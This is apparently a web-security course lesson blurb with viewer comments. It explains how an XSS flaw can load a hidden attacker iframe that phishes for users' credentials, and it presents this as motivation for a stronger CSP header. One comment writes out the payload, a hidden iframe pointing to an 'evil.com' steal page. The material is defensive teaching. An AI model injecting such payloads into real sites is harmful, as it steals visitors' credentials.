In this lesson, we'll learn how to exploit an XSS vulnerability to prompt victims for their usernames and passwords on a vulnerable site by loading up a IFRAME from the attacker's website. This will demonstrate that even though we've already mitigated JS based XSS attacks, there are other ways to exploit XSS, and we'll need a more robust CSP header to completely mitigate XSS, which we'll discover in our next lesson!
typo: 'propmt' should be -> 'prompt'
at payload level:
i guess that 'payload', this time, should be only :
< iframe hidden src="https://evil.com:666/steal.html"></iframe>
Thanks for this! I got the transcripts updated!